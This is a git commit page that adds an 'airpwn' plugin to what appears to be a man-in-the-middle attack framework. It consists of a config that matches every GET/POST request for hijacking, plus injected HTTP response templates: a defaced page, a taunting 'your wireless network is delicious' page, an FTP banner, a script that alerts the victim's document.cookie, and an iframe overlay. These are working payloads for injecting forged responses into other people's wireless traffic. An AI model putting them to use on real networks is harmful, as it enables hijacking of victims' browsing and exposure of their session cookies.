added airpwn plugin

This commit is contained in:
byt3bl33d3r 2014-10-31 00:46:43 +01:00
commit 8ff9c246db
12 changed files with 162 additions and 1 deletions

9
config_files/airpwn.cfg Normal file
View file

@ -0,0 +1,9 @@
#Example config for the AirPwn plugin
[site_hijack]
match = ^(GET|POST).*
response = ./config_files/airpwn_templates/site_hijack
#[puppy_jpg]
#match = ^GET [^ ]+\.(?i:jpg|jpeg|gif|png)
#response = ./config_files/airpwn_templates/puppy_jpg

View file

@ -0,0 +1,3 @@
Sample content used by the configurations in the conf/ directory. See
the README there for more information.

View file

@ -0,0 +1,10 @@
HTTP/1.1 200 OK
Content-type: text/css
Content-length: 103
body {
background-color: red;
background-image: url(/airpwnbg.jpg);
background-repeat: repeat;
}

Binary file not shown.

View file

@ -0,0 +1,2 @@
331 FTP IS FUN!!!! ENJOY YOUR DATA!!!

View file

@ -0,0 +1,11 @@
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><head><title>HELLO DEFCON!</title>
</head><body>
<blink><font size=+5 color=red>
Hello Defcon! Your wireless network is delicious!
</font>
</blink>
<p>

View file

@ -0,0 +1,13 @@
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><head><title>pwned</title>
</head><body onLoad="
alert('hi');
alert('you');
alert('are');
alert('so');
alert('owned');
alert('cookie: ' + document.cookie);">

Binary file not shown.

View file

@ -0,0 +1,15 @@
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 250
<html>
<head><title>hugs</title></head>
<body>
<iframe frameborder=0 border=0 src="http://google.com" width="100%"
height="100%">hugs</iframe>
<div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
BYE BYE!
<!--